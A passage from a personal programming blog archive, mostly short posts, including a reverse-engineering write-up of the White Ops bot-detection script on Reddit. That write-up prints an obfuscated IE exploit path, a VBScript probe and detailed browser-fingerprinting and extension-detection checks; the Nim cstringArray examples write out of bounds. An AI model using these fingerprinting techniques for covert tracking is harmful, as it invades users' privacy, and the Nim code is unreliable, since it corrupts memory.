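// Example usage of the Expr wrapper defined above.
let expr = Expr::from_string("distracted and (hn or twitter or fb)").unwrap();
assert!(expr.matches(&["distracted", "hn"]));
assert!(!expr.matches(&["code", "ttw"]));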

That’s it! If you want some more Boolean expression content, check out the test suite for some more moderately interesting tests.

TagTime Web: my stochastic time tracking web app

By · · 2 minute read

Recently I’ve been working on TagTime Web (my server, but you can host your own). It’s an open-source web-based version of the original TagTime. It uses stochastic time tracking, which randomly samples what you are doing throughout the day (on average 45 minutes apart by default). This page explains it quite well. I have also made a video about how this type of time tracking works, and a demonstration video.

Here are some features it has:

  • Each tag gets a unique colour based on its name
  • Tag autocomplete
  • Dark mode
  • Mobile support
  • Offline support (it is a PWA)
  • Filtering pings
  • Charts!
    • Daily distribution
    • Daily trend
    • Matrix

Check it out!

reddit

By · · 0 minute read

Reddit's website uses DRM for fingerprinting

By · · 4 minute read

Recently, I was using a page on Reddit (i.e. the main redesign domain, not old.reddit.com) when I saw a yellow bar from Firefox:

Reddit asking for permission to use DRM

Why did Reddit want to use DRM? This pop-up was appearing on all pages, even ones with no audio or video. To find out, I did a bunch of source code analysis.

Reddit’s source code uses bundling and minification, but I was able to infer that in ./src/reddit/index.tsx, a script is conditionally loaded into the page. If the show_white_ops A/B test flag is set, it loads another script: https://s.udkcrj.com/ag/386183/clear.js. That script in turn loads https://s.udkcrj.com/2/4.71.0/main.js (it appears to test for a browser bug involving running JSON.parse with null bytes, and sometimes loads https://s.udkcrj.com/2/4.71.0/JSON-main.js instead – I haven’t analyzed that file, but it looks fairly similar – and it does nothing if, due to another browser bug, !("a" == "a"[0]) evaluates to true).

The purpose of all of this appears to be both fingerprinting and preventing ad fraud. I’ve determined that udkcrj.com belongs to White Ops (edit: they have recently rebranded to HUMAN). I have inferred this from the name of Reddit’s feature flag, and from mentions of White Ops, which is a “global leader in bot mitigation, bot prevention, and fraud protection”. They appear to do this by collecting tons of data about the browser and analyzing it. I must say, their system is quite impressive.

Back to the DRM issue: it appears that the script is checking what DRM solutions are available, but not actually using them. However, just checking is enough to trigger Firefox into displaying the DRM popup. Specifically, it looks for Widevine, PlayReady, Clearkey, and Adobe Primetime.

main.js does a bunch of other interesting things, but there are so many that I’ve written a whole separate blog post about all of the ones I found. Here are some highlights:

  • Contains what appears to be a JavaScript engine JIT exploit/bug: "haha jit go brrrrr" appears in a part of the code that seems to be doing something weird with math operations.
  • Has an obfuscated reference to res://ieframe.dll/acr.js, which can be used to exploit old Internet Explorer versions (I think)
  • Many checks for various global variables and other indicators of headless and automated browsers.
  • Sends data to vprza.com and minkatu.com.
  • Checks if devtools is open
  • Detects installed text to speech voices
  • Checks if browsers have floating point errors when rounding 0.49999999999999994 and 2^52
  • Detects if some Chrome extensions are installed
  • Checks if function bodies that are implemented in the browser contain [native code] when stringified
    • it gets kinda meta: it checks if toString itself is implemented in native code (although it doesn’t go any levels deeper than that)
  • Checks for Apple Pay support

Weird. Thanks for reading.

whiteops

By · · 0 minute read

Data WhiteOps collects

By · · 11 minute read

Edit: White Ops has recently rebranded to HUMAN.

Today I noticed New Reddit was asking to use DRM. So I went on a source code analysis journey! See the main post for more details.

It appears Reddit uses White Ops for fingerprinting and ad fraud prevention (but only sometimes, I think it’s an A/B test). See this beautified code:

const t = e.user.account ? Jt()(e.user.account.id).toString() : void 0,
    s = document.createElement("script");
s.src = Object(es.a)("https://s.udkcrj.com/ag/386183/clear.js", {
    dt: "3861831591810830724000",
    pd: "acc",
    mo: 0,
    et: 0,
    ti: $t()(),
    ui: t,
    si: "d2x"
}), document.head.appendChild(s)

This code is only run if the show_white_ops feature flag is enabled (I don’t know how to force this to be true), which is why I assume the tracking is done by WhiteOps. Further research into the https://s.udkcrj.com/ag/386183/clear.js file reveals that it ends up loading another script, https://s.udkcrj.com/2/4.71.0/main.js.

Note: here is a function I used to deobfuscate many strings in the code:

const deob = x => x.replace(/[A-Za-z]/g, function(e) {
    return String.fromCharCode(e.charCodeAt(0) + (e.toUpperCase() <= "M" ? 13 : -13))
})

Note 2: Ozoki appears to be some sort of internal codename used by WhiteOps.

This very obfuscated script does many things, including (this is an incomplete list – I have missed many things):

  • Communicates with vprza.com and minkatu.com
  • Does device/OS detection
  • Attempts to detect if DevTools is open (looks at __IE_DEVTOOLBAR_CONSOLE_COMMAND_LINE)
  • Something weird with the text-underline-offset CSS property
  • Has the names of a bunch of ad servers, presumably as to not serve ads to bots
  • Attempts to create an ActiveXObject (only exists in old IE versions), and checks if the created ActiveX object isSandboxed
  • Checks for maxConnectionsPerServer and onhelp properties on window (for browser engine detection I think)
  • Attempts to exploit an IE11 vuln!
    • it checks the value of document.documentMode, which in IE11 is 11. If it is, then it runs the obfuscated code:
// o == document.documentMode == 11
"}o|B65niitbmd,ahg)Z[i$_g".replace(/./g, function(e) {
    return String.fromCharCode(e.charCodeAt(0) - o--)
})
  • this evaluates to res://ieframe.dll/acr.js, but only on IE. This string has only one purpose: exploiting the fact that you can put arbitrary HTML in the hash part of the URL and have it get evaluated, I believe in a privileged context of some sort. This file actually resolves in IE to an internal Windows system file, which is only accessible in JS due to a bug.
  • tries to run VBScript:
execScript("e71012934811a=false::On Error Resume Next::" + e + "::if Err.Number=-2147024891 or Err.Number=5002 then e71012934811a=true::Err.Clear", "VBScript"), t = "e71012934811a" in window ? window.e71012934811a ? o.EXISTS : o.MISSING : o.UNKNOWN
  • checks for these strings on window (de-obfuscated, I also have the original obfuscated ones in case you are also looking through the source):
    • boltsWebViewAppLinkResolverResult, GoogleJsInterface, googleAdsJsInterface, accessibilityTraversal, accessibility, FbPlayableAd, __REACT_WEB_VIEW_BRIDGE
    • obfuscated in code as obygfJroIvrjNccYvaxErfbyireErfhyg, TbbtyrWfVagresnpr, tbbtyrNqfWfVagresnpr, npprffvovyvglGenirefny, npprffvovyvgl, SoCynlnoyrNq, __ERNPG_JRO_IVRJ_OEVQTR
  • checks the screen’s availHeight, availWidth, width, and height
  • checks the screen’s colorDepth, pixelDepth, and devicePixelRatio
  • checks for these automation-related properties on window: domAutomation, domAutomationController, _WEBDRIVER_ELEM_CACHE, _phantom, callPhantom, window.chrome._commandLineAPI, window.Debug.debuggerEnabled, __BROWSERTOOLS_CONSOLE, window._FirebugCommandLine, and also if document.documentElement.hasAttribute("webdriver") is true
  • checks if "function () { return Function.apply.call(x.log, x, arguments); }" == window.console.log.toString() (also to check for browser automation, I guess)
  • tries to check if the browser is headless with isExternalUrlSafeForNavigation, window.opera._browserjsran, window.opera.browserjsran
  • checks if navigator.onLine is true
  • check the window.chrome object if in Chrome
  • extracts data from window.FirefoxInterfaces("wdICoordinate", "wdIMouse", "wdIStatus")
  • checks if window.XPCOMUtils exists
  • checks if window.netscape.security.privilegemanager exists
  • appears to check browser console timing
  • checks referer against "https://www.google.com", "https://apps.skype.com", "http://apps.skype.com", "https://www.youtube.com", "http://en.wikipedia.org/", "https://en.wikipedia.org/", "https://www.netflix.com", "http://www.netflix.com", "http://www3.oovoo.com"
  • checks for these properties in window.external: ["AddChannel", "AddDesktopComponent", "AddFavorite", "AddSearchProvider", "AddService", "AddToFavoritesBar", "AutoCompleteSaveForm", "AutoScan", "bubbleEvent", "ContentDiscoveryReset", "ImportExportFavorites", "InPrivateFilteringEnabled", "IsSearchProviderInstalled", "IsServiceInstalled", "IsSubscribed", "msActiveXFilteringEnabled", "msAddSiteMode", "msAddTrackingProtectionList", "msClearTile", "msEnableTileNotificationQueue", "msEnableTileNotificationQueueForSquare150x150", "msEnableTileNotificationQueueForSquare310x310", "msEnableTileNotificationQueueForWide310x150", "msIsSiteMode", "msIsSiteModeFirstRun", "msPinnedSiteState", "msProvisionNetworks", "msRemoveScheduledTileNotification", "msReportSafeUrl", "msScheduledTileNotification", "msSiteModeActivate", "msSiteModeAddButtonStyle", "msSiteModeAddJumpListItem", "msSiteModeAddThumbBarButton", "msSiteModeClearBadge", "msSiteModeClearIconOverlay", "msSiteModeClearJumpList", "msSiteModeCreateJumpList", "msSiteModeRefreshBadge", "msSiteModeSetIconOverlay", "msSiteModeShowButtonStyle", "msSiteModeShowJumpList", "msSiteModeShowThumbBar", "msSiteModeUpdateThumbBarButton", "msStartPeriodicBadgeUpdate", "msStartPeriodicTileUpdate", "msStartPeriodicTileUpdateBatch", "msStopPeriodicBadgeUpdate", "msStopPeriodicTileUpdate", "msTrackingProtectionEnabled", "NavigateAndFind", "raiseEvent", "setContextMenu", "ShowBrowserUI", "menuArguments", "onvisibilitychange", "scrollbar", "selectableContent", "version", "visibility", "mssitepinned", "AddUrlAuthentication", "CloseRegPopup", "FeatureEnabled", "GetJsonWebData", "GetRegValue", "Log", "LogShellErrorsOnly", "OpenPopup", "ReadFile", "RunGutsScript", "SaveRegInfo", "SetAppMaximizeTimeToRestart", "SetAppMinimizeTimeToRestart", "SetAutoStart", "SetAutoStartMinimized", "SetMaxMemory", "ShareEventFromBrowser", "ShowPopup", "ShowRadar", "WriteFile", "WriteRegValue", "summonWalrus" and also "AddSearchProvider", "IsSearchProviderInstalled", "QueryInterface", "addPanel", "addPersistentPanel", "addSearchEngine"
  • checks maxConnectionsPerServer (on Window I think)
  • attempts to detect Brave Browser with window.brave
  • checks for a bunch more properties on window:
                m("document_referrer", h), m("performance_timing", h, function(e) {
                    return x.qKjvb(e)
                }), m("maxConnectionsPerServer", h), m("status", h), m("defaultStatus", h), m("performance_memory", h, _.flatten), m("screen", h, function(e) {
                    return e || {}
                }), m("devicePixelRatio", h), m("mozPaintCount", h), m("styleMedia_type", h), m("history_length", h), m("opener", h, "top_opener", function(e) {
                    return null !== e ? typeof e : "null"
                }), m("navigator_userAgent", h), m("fileCreatedDate", h), m("fileModifiedDate", h), m("fileUpdatedDate", h), m("lastModified", h), m("location_href", h), m("RemotePlayback", h), m("Permissions", h), m("Notification", h), m("MediaSession", h), m("name", h, function(e) {
                    return e.substr(0, 128)
                }), m("defaultView", h, "document_defaultView", function(e) {
                    return void 0 === e ? "undefined" : e === window
                }), m("console", h, _.flatten), m("localStorage", h, v), m("webkitNotifications", h, v), m("webkitAudioContext", h, v), m("chrome", h, k.Keys), m("opera", h, k.Keys), m("navigator_standalone", h), m("navtype", h, "performance_navigation_type"), m("navredirs", h, "performance_navigation_redirectCount"), m("loadTimes", h, "chrome_loadTimes"), m("vendor", h, "navigator_vendor"), m("codename", h, "navigator_appCodeName"), m("navWebdriver", h, "navigator_webdriver"), m("navLanguages", h, "navigator_languages"), m("ServiceWorker", h), m("ApplePaySetup", h), m("ApplePaySession", h), m("Cache", h), m("PaymentAddress", h), m("MerchantValidationEvent", h), m("mediaDevices", h, "navigator_mediaDevices"), m("share", h, "navigator_share"), m("onorientationchange", h), m("document_defaultView_safari", h), m("navigator_brave", h), m("navigator_brave_isBrave", h), le.hco && m("navHardwareConc", h, "navigator_hardwareConcurrency"), le.ndm && m("navDevMem", h, "navigator_deviceMemory"), le.nvl && (m("navLocks", h, "navigator_locks", function(e) {
                    var t = typeof e;
                    return "undefined" === t ? "undefined" : "object" === t ? "obj" : e
                }), m("navLocksR", h, "navigator_locks_request", function(e) {
                    return "undefined" === typeof e ? "undefined" : e
                })), le.wor && m("origin", h, "origin"), "object" == typeof location && m("protocol", location), "object" == typeof document && (m("hidden", document), m("documentMode", document), m("compatMode", document), m("visibilityState", document), m("d_origin", document, "origin"), m("ddl_origin", document, "defaultView_location_origin"));
  • checks mozIsLocallyAvailable (which is only available on FF <= 35, and could be for checking if someone is trying to debug this script offline)
  • checks how rounding of large and small numbers works, with Math.round(.49999999999999994) and Math.round(Math.pow(2, 52))
  • checks the installed plugins (with navigator.plugins)
  • checks the browser viewport
  • attempts to get the “frame depth” (not sure what exactly that is)
  • checks for various status bars on window ("locationbar", "menubar", "personalbar", "scrollbars", "statusbar", "toolbar")
  • checks for window.showModalDialog
  • checks the -webkit-text-size-adjust property
  • checks if using xx-small as a font size works
  • Checks if image loading is enabled, by trying to load a 1x1 GIF
  • Tries to load an image with a URL of https:/, and checks if it loaded or errored
  • Checks the stringification o
  • checks for these properties on window: StorageItem AnimationTimeline MSFrameUILocalization HTMLDialogElement mozCancelRequestAnimationFrame SVGRenderingIntent SQLException WebKitMediaKeyError SVGGeometryElement SVGMpathElement Permissions devicePixelRatio GetSVGDocument HTMLHtmlElement CSSCharsetRule ondragexit MediaSource external DOMMatrix InternalError ArchiveRequest ByteLengthQueuingStrategy ScreenOrientation onwebkitwillrevealbottom onorientationchange WebKitGamepad GeckoActiveXObject mozInnerScreenX WeakSet PaymentRequest Generator BhxWebRequest oncancel fluid media onmousemove HTMLCollection OpenWindowEventDetail FileError SmartCardEvent guest CSSConditionRule showModelessDialog SecurityPolicyViolationEvent EventSource ServiceWorker EventTarget origin VRDisplay onpointermove HTMLBodyElement vc2hxtaq9c TouchEvent DeviceStorage DeviceLightEvent External webkitPostMessage HTMLAppletElement ErrorEvent URLSearchParams BluetoothRemoteGATTDescriptor RTCStatsReport EventException PERSISTENT MediaKeyStatusMap HTMLOptionsCollection dolphinInfo MSGesture SVGPathSegLinetoRel webkitConvertPointFromNodeToPage doNotTrack CryptoDialogs HTMLPictureElement MediaController
  • checks for these CSS properties: scroll-snap-coordinate flex-basis webkitMatchNearestMailBlockquoteColor MozOpacity textOverflow position columns msTextSizeAdjust animationDuration msImeAlign webkitBackgroundComposite MozTextAlignLast MozOsxFontSmoothing borderRightStyle webkitGridRow cssText parentRule webkitShapeOutside justifySelf isolation -moz-column-fill offsetRotation overflowWrap OAnimationFillMode borderRight border-inline-start-color webkitLineSnap MozPerspective touchAction enableBackground borderImageSource MozColumnFill webkitAnimationFillMode MozOSXFontSmoothing XvPhonemes length webkitFilter webkitGridAutoColumns
  • checks the stringification of native functions, and verifies some functions are implemented in native code (including performance.mark, and Function.prototype.toString itself)
  • attempts to get the width of the string mmmmmmmmmmlli in all of these fonts: "Ubuntu", "Utopia", "URW Gothic L", "Bitstream Charter", "FreeMono", "DejaVu Sans", "Droid Serif", "Liberation Sans", "Vrinda", "Kartika", "Sylfaen", "CordiaUPC", "Angsana New Bold Italic", "DFKai-SB", "Ebrima", "Lao UI", "Segoe UI Symbol", "Vijaya", "Roboto", "Apple Color Emoji", "Baskerville", "Marker Felt", "Apple Symbols", "Chalkboard", "Herculanum", "Skia", "Bahnschrift", "Andalus", "Yu Gothic", "Aldhabi", "Calibri Light"
  • checks various user agent properties in navigator
  • Listens to the voiceschanged event, and keeps track of what text-to-speech voices are available
  • Attempts to load chrome://browser/skin/feeds/feedIcon.png (I think this used to be an RSS icon in old Firefox versions)
  • checks for scripts injected into the page
  • checks available video codecs and formats: 'video/mp4;codecs="avc1.42E01E, mp4a.40.2"', 'video/mp4;codecs="avc1.58A01E, mp4a.40.2"', 'video/mp4;codecs="avc1.4D401E, mp4a.40.2"', 'video/mp4;codecs="avc1.64001E, mp4a.40.2"', 'video/mp4;codecs="mp4v.20.8, mp4a.40.2"', 'video/mp4;codecs="mp4v.20.240, mp4a.40.2"', 'video/3gpp;codecs="mp4v.20.8, samr"', 'video/ogg;codecs="theora, vorbis"', 'video/ogg;codecs="theora, speex"', "audio/ogg;codecs=vorbis", "audio/ogg;codecs=speex", "audio/ogg;codecs=flac", 'video/ogg;codecs="dirac, vorbis"', 'video/x-matroska;codecs="theora, vorbis"', 'video/mp4; codecs="avc1.42E01E"', 'audio/mp4; codecs="mp4a.40.2"', 'audio/mpeg;codecs="mp3"', 'video/webm; codecs="vorbis,vp8"'
  • checks for window.$cdc_asdjflasutopfhvcZLmcfl_ (property used by Chrome Webdriver) (obfuscated as "$" + x.qKjBI("pqp") + "_" + x.qKjBI("nfqwsynfhgbcsuipMYzpsy") + "_")
  • gets WEBGL_debug_renderer_info, which contains GPU-specific info
  • tries to detect if IntersectionObserver returns correct data
  • checks what DRM solutions are available (although it doesn’t actually use them; this is what causes the DRM popup in Firefox): looks for Widevine, PlayReady, Clearkey, and Primetime
  • Attempts to load files stored in Chrome extension’s data (presumably to detect if they are installed):
chrome-extension://ianldemdppnbbojbafdkpdofceajhica/img/info.svg
chrome-extension://elfchnpigjboibngodkiamfemllklmge/img/info.svg
chrome-extension://npfnhmfcalmmkbpgkhjpdaiajfdhpndm/img/info.svg
chrome-extension://pfobdhfgohkddopcdbifhccbbpjlakaa/img/info.svg
chrome-extension://gfpioeglfjecbkeeomdidlndcagpbmj/img/info.svg
chrome-extension://mnbkfnehljejnebgbgfhdkmjicgmangi/img/info.svg
chrome-extension://adcggpckpldlkcobapimobdijchkigmb/img/info.svg
chrome-extension://poifgggpiofkbhafbjljpbbajafcjafi/img/info.svg
chrome-extension://plkjhgplpjlokmchnngcaeneiigkipeb/img/info.svg
chrome-extension://hhhpajpnecmhngfgkclokcghcpfgbape/img/info.svg
chrome-extension://cnncicmafnkgbonafdjnikijbhjkeink/img/info.svg
chrome-extension://aoeceebmempjbabimmnfkeeioccbjkea/img/info.svg
chrome-extension://pbclflhfplnkbgfokopkmjpejkokcaec/img/info.svg
chrome-extension://pogfikdkppcfejpknaclddnpcjjbalbn/img/info.svg
chrome-extension://mdjpmjaonahjbjncdlkjgeggjfdnnmme/img/info.svg
chrome-extension://cefomhonapiagddecgpooacpnoomabne/img/info.svg
chrome-extension://iokdapkmdldpeomcloobkajedcdleoib/img/info.svg
chrome-extension://cndipecijohebobplligphncocjamhei/content/images/icons/16.png
chrome-extension://lmpknllkkhpbfahgbkgjgopandmdbopi/blocked-notification-bar.html
chrome-extension://blddopfbnibgpgfeheedhjaheikanamn/img/128x128g.png
chrome-extension://nfjcghppefdfgmnblhgelkjhmljpndhh/img/icon16.png
  • checks if the source code of window.close (which is normally [native code]) contains ELECTRON
  • there is the string “haha jit go brrrrr”, as part of what appears to be either a test for a JS engine bug or an exploit
  • collects performance data
  • checks if Safari is creating a “Web clip” screenshot of the page

Gmail's fake loading indicator

By · · 2 minute read

Whenever I visit Gmail, I see its loading indicator for a fraction of a second before it loads:

A looping image of an envelope opening, with the text “Loading Gmail” below it

Here’s what it looks like when I artificially throttle my network connection to dial-up speeds, preventing Gmail from loading within a reasonable time (it would take several minutes for Gmail to actually load, but you couldn’t tell that from the loading bar):

A looping image of an envelope opening, with the text “Loading Gmail” below it. A loading bar appears, which fills up quickly at first, but then slows down, and eventually stops moving entirely.

Some investigation reveals that Gmail’s loading bar isn’t an actual loading bar! In fact, its progress is controlled by a CSS animation that makes it start fast, then slow down, then just stand still until Gmail is loaded. This defeats the point of a loading bar: it’s supposed to give an estimate of progress, not fill up at a rate entirely unrelated to actual loading!

How I improved this blog

By · · 3 minute read

I’ve recently made many improvements to this blog. This post will go into those changes, and how I implemented them.

Merging smitop.com and blog.smitop.com

Before these changes, I had two sites: smitop.com and blog.smitop.com. smitop.com was a pure static site, and blog.smitop.com was a static site generated with Hugo. Now, it’s just one site, smitop.com, generated with Hugo. All of the static content is in Hugo’s static directory. I use Cloudflare Workers to redirect requests to the old blog.smitop.com domain over to smitop.com. Since the URL structure for blog posts is the same, the worker just does a 301 redirect to the root domain with the same path:

addEventListener("fetch", event => {
  event.respondWith(handleRequest(event.request))
})

const ROOT = "https://smitop.com";

async function handleRequest(request) {
  try {
    const urlObj = new URL(request.url);
    return new Response("", {status: 301, headers: {location: ROOT + urlObj.pathname}});
  } catch (e) {
    return new Response("", {status: 301, headers: {location: ROOT}});
  }
}

There’s probably a way to do this without using Workers, but I decided to use Workers since they seem cool.

Styling

My blog has gone from almost completely unstyled, to fairly consistent styling. I use the Barlow font for headings, and Mukta Vaani for everything else. I use a custom Hugo theme I wrote just for this blog to give me complete control.

Deploys

While this hasn’t changed, I use Travis CI, which builds commits to master and deploys them to Surge.

Open source

It’s open source now! I actually have two repos for this blog, a public one and a private one. The private one contains my unpublished blog posts and some other non-public things. I use GitHub Actions to sync the two repos automatically.

hugo

By · · 0 minute read

meta

By · · 0 minute read

Generating our own knowledge panels

By · · 7 minute read

Demo

Try entering a query and looking at the results! Wait a few seconds after entering your query; it might take a bit to load and update.

Explanation

I’ve had a lot of time on my hands recently (due to COVID-19). If you are an avid search engine user (you almost certainly are), then you’ll likely have seen a panel on the side of your search results that looks like this (this screenshot is of Google, but feel free to try these with your search engine of choice):

Douglas Adams knowledge graph panel screenshot

But that’s not all! If we search for some specific fact about Douglas Adams, such as his height, Google is able to figure it out and tell us:

Screenshot of Google’s knowledge graph telling me that Douglas Adams’s height is 1.96 meters

How is Google able to figure this out? Google has a database with a bunch of facts in it, called their “knowledge graph”. Those facts are sometimes called triples, since they have three parts: for the above example, a subject: Douglas Adams, a predicate: height, and an object: 1.96 meters.

Aside: You might also hear about quads: they’re like triples, but the 4th part is the context, which identifies what database/graph the quad is a part of.

Google isn’t the first or only company to have a knowledge graph, however. Wolfram Alpha also has one. Bing also has one. Both are able to tell you Douglas Adams’s height. So, where do they get all of their data from?

While every knowledge graph has its differences (Wolfram Alpha’s is a lot more curated, for example), many of the facts in Google and Bing appear to be sourced from Wikidata. I could write a lot about Wikidata’s data model, but the simplified version is that it’s a triplestore that anybody can edit, similar to Wikipedia. In fact, it’s run by the same Wikimedia Foundation that runs Wikipedia, and it’s possible with some template magic to include Wikidata facts in Wikipedia articles. Triples, or statements as Wikidata refers to them, can also have references associated with them to identify what sources support a claim, and qualifiers to add more detail to a claim (for example, when a claim started being true).

Note: Wikidata isn’t the only source! I’m pretty sure Google uses DBpedia, and there are probably some proprietary datasets they pay for.

All of the structured data in Wikidata is licensed under CC0, which puts it in the public domain. As such, there’s no easy way to tell if Google uses Wikidata, since they don’t say anywhere, nor are they required to. There’s a hard way to tell, though! Comparing Google’s data to Wikidata shows that Google’s knowledge graph almost always has the exact same data as Wikidata. Also, Google’s knowledge graph occasionally reflects mistakes in Wikidata.

So, how can we access the data in Wikidata? The two main ways are the API and the entity dumps. Wikidata’s API allows you to programmatically query and edit Wikidata. The entity dumps are just really big files that contain every statement in Wikidata, created roughly weekly. The all dump contains all statements in Wikidata, and is really big – over 2TB uncompressed (well, that’s just an estimate; I don’t have enough storage to decompress the thing and find out the exact amount). The truthy dump is smaller, and just contains truthy statements, which are the most current/correct statements (Wikidata doesn’t just store statements that are currently true, but also things that have been true in the past, and things that are known to be wrong, so that bots don’t incorrectly re-add them). truthy is just over 1TB in size uncompressed.
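
For example, fetching the JSON for a single entity through the API is just an HTTP GET against the wbgetentities endpoint. A quick sketch in Rust (assuming the reqwest crate with its blocking feature; my backend works off the dumps instead):

// Sketch: fetch one entity's JSON from the Wikidata API (not what the backend does).
fn fetch_entity_json(id: &str) -> Result<String, reqwest::Error> {
    // e.g. id = "Q42" (Douglas Adams)
    let url = format!(
        "https://www.wikidata.org/w/api.php?action=wbgetentities&ids={}&format=json",
        id
    );
    reqwest::blocking::get(url)?.text()
}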

The data is available in multiple formats, but I use the JSON one, since it’s easier to parse and work with. The data dump is processed and turned into a bunch of files, one for each entity. When data is needed about an entity, its file is just read from the file system. I’m effectively using the file system as a database. Also, it turns out that not all filesystem formats are able to handle millions of files in a directory very well. After my first failed attempt with ext4, I tried again with XFS, which works quite well (not that I’ve compared it to anything else).

When you type a query into the knowledge panel generator I showed at the beginning of the post, it has to search through tens of millions of possible entities’ names and aliases. The backend is implemented entirely in Rust. Optimizing this to work on a VPS without much RAM or compute power was a challenge. I’ve ended up using Rust’s BTreeMap to store all entity names and aliases in one big binary tree. However, this posed a problem at first: Wikidata items don’t all have unique names and aliases. The only unique identifier for a Wikidata item is its ID (Q219237, for example). There are many entities in Wikidata that share the same name, such as people who happen to have the same full name, or Q89 (apple, the fruit) and Q213710 (Apple, the record label). Since a BTreeMap can’t have two identical keys (they would just overwrite each other), I use a key of (String, usize). That’s a tuple where the first element is the normalized name of the entity, and the second is a unique number for each item.

When a query is made, I look up the range of everything from the query text to the query with ZZ at the end. I’m effectively doing a prefix search across the binary tree.
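
In code, that range lookup might look something like this (a sketch with hypothetical names; the real code differs):

use std::collections::BTreeMap;

// Hypothetical index: (normalized name, unique per-item number) -> Wikidata ID.
fn prefix_search(index: &BTreeMap<(String, usize), String>, query: &str) -> Vec<String> {
    // Everything from (query, 0) to (query + "ZZ", MAX) covers the keys whose name
    // starts with the query, assuming the normalization makes "ZZ" sort after any
    // continuation of the query.
    let start = (query.to_string(), 0);
    let end = (format!("{}ZZ", query), usize::MAX);
    index.range(start..=end).map(|(_, id)| id.clone()).collect()
}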

Once all possible options are found, I try to generate infoboxes for all of them. Sometimes it fails to generate an infobox (for instance, because there are no triples that it knows how to handle), but otherwise it just inserts all of the triples it can handle into a box. The social media links just check against a few properties, and use SVG logos.

Of course, my knowledge panel isn’t perfect! It currently doesn’t display all of the parts of a location (it just does “London”, instead of “London, England”), and is missing support for many Wikidata properties. Hopefully I’ll be able to improve it in the future!

Thanks for reading! If you have any questions, comments, concerns, or inquiries feel free to email them to cogzap@speakscribe.com.

By the way, I wrote this post with Roam; it’s a pretty neat tool.

search

By · · 0 minute read

A bookmarklet to amplify YouTube

By · · 2 minute read

Want to amplify YouTube videos? Often when I’m watching one I’ll find it isn’t loud enough. That’s when I use this bookmarklet.

Drag this to your bookmarks bar, and use it on a YouTube video: Amplify YT

youtube

By · · 0 minute read

How to use private JS class variables

By · · 3 minute read

Private class variables in JavaScript

Private variables in JavaScript are gaining browser support. As I write this, they’re supported in ~63% of browsers. You can use the Babel plugin @babel/plugin-proposal-class-properties to transform them into cross-browser code, though. Let’s take a look at how you can use private variables in ES6 classes.

Private fields - basics

You can declare private fields in ES6 classes by prefixing the variable name with a #, like so:

class Counter {
  #value = 0;
  increase() {
    this.#value++;
  }
  value() {
    return this.#value;
  }
}

This class represents a counter with a value that can only be increased. Here’s how you can use it:

const c = new Counter;
c.increase();
c.increase();
c.increase();
console.assert(c.value() === 3);

You can’t do any of these things, due to privacy rules which prevent any usage of private variables outside of the class declaration:

const c = new Counter;
c.#value = 3; // can't do since not in a class function
c.decrease = () => this.#value--; // can't do since not in class declaration

Private functions

You can make private functions too:

class Computer {
  #bios =    function () { /* ... */ }
  #loadRam = function () { /* ... */ }
  #loadOs =  function () { /* ... */ }
  turnOn() {
    this.#bios();
    this.#loadRam();
    this.#loadOs();
  }
}

You can call the turnOn method, but you can’t call #bios, #loadRam, or #loadOs by themselves. Private functions can also access private variables.

Variable without initial value

You can avoid setting an initial value by omitting the = ... part:

class Example {
  #private;
}

Static private variables

You can set static private variables, which can be used by static functions of the class, private functions of the class, and non-static methods:

class Example {
  static #password = "hunter1";
  
  // all of these functions return "hunter1"
  static #privateGetPassword = () => this.#password;
  static staticGetPassword() {
    return this.#password;
  }
  static privateGetPassword() {
    return this.#privateGetPassword();
  }
  getPassword() {
    return Example.#password;
  }
}

Square bracket notation doesn’t work

Confusingly, it’s possible to end up with two variables in a class whose names start with #. Private variables cannot be accessed with square bracket notation (e.g. this['#varName']); if you attempt to do so, you’ll instead set an ordinary public property whose name starts with #. This means that you can have two variables with the same name! Make sure you avoid square brackets when working with private variables, otherwise you’ll get some hard-to-fix bugs.

tutorial

By · · 0 minute read

alertready

By · · 0 minute read

AlertReady To Retire Ku Band Alerts

By · · 2 minute read

Pelmorex Inc., the company that runs Canada’s national emergency alerts system, AlertReady, has announced that they will stop broadcasting emergency alerts on the Ku satellite band.

Alert distributors will still be able to receive alerts through other methods, including C band satellite communication, an RSS feed, an Internet-based stream, and an alert archive.

In an email to alert broadcasters, Pelmorex said that they were retiring the band due to Ku band signals “being used by very few LMDs (mainly as a backup connection)”. They will stop broadcasting on August 31, 2019.

canada

By · · 0 minute read

pelmorex

By · · 0 minute read

Easily upload files to IPFS, online

By · · 2 minute read

Need to upload files to IPFS quickly? With my new Upload2IPFS tool, you can upload files straight from your browser.

It uses Infura’s API to upload files. While Infura should pin uploaded files to their node, it’s a good idea to pin them locally (the tool provides a command you can copy to do that) or with a pinning service.

The tool itself is hosted on CloudFlare’s IPFS gateway, which works really well for a simple static page. You can view the source code on GitHub.

Enjoy!

infura

By · · 0 minute read

ipfs

By · · 0 minute read

storage

By · · 0 minute read

frames

By · · 0 minute read

How to watch YouTube video frame-by-frame

By · · 2 minute read

Watching YouTube videos frame-by-frame can be done with just two keyboard shortcuts: . and ,.

First, pause the video. Otherwise this won’t work. Press , to go back one frame, and . to go forward one frame.

videos

By · · 0 minute read

Next Canada-wide emergency alert test announced for May 8

By · · 2 minute read

Pelmorex Corp, the corporation responsible for managing Canada’s AlertReady emergency alerts, has announced the date for the next nationwide test alert: May 8.

The corporation announced the test on its website, saying that the test alerts will be sent out across the country around noon, local time.

A table of times of emergency alerts.

These alerts will be played through Canada’s emergency alert infrastructure, including phones, TV broadcasts, and radio.

The alerts are marked “Broadcast Intrusive”, meaning that they immediately interrupt television and radio programming to display the alert.

nim

By · · 0 minute read

Nim: How to use a cstringArray

By · · 3 minute read

The Nim system module (which is automatically imported into every Nim file) has a cstringArray type. However, its usage is a bit tricky to figure out, and there’s really no point in using it in normal Nim code. It’s really only useful for interfacing with C/C++/Objective-C libraries and wrappers.

cstringArrays are created by using the allocCStringArray proc in the system module. You must pass in a Nim openArray as the starting point of the cstringArray. If you want to start from a blank state, pass in an empty array:

var array = allocCStringArray([])
array[0] = "foo" # array is now ["foo"]

var invalidArray = allocCStringArray() # results in error

You can also start from an existing openArray:

var array = allocCStringArray(["bar"]) # array is ["bar"]
array[1] = "baz" # array is ["bar", "baz"]
array[0] = "quz" # array is ["qux", "baz"]

The easiest way to loop over the elements of a cstringArray is to convert it to a seq and loop over that. Because Nim doesn’t keep track of the length of a cstringArray, you have to keep track of that some other way. Make sure you get the length right. If it’s too small, you won’t loop over all the elements. Too big, and you’ll get results that can vary wildly: you might get empty strings, random data, or even crashes if you try to read past the end of the cstringArray.

var array = allocCStringArray(["corge", "waldo"])

for ele in cstringArrayToSeq(array, 2):
  echo ele # prints corge and waldo
  
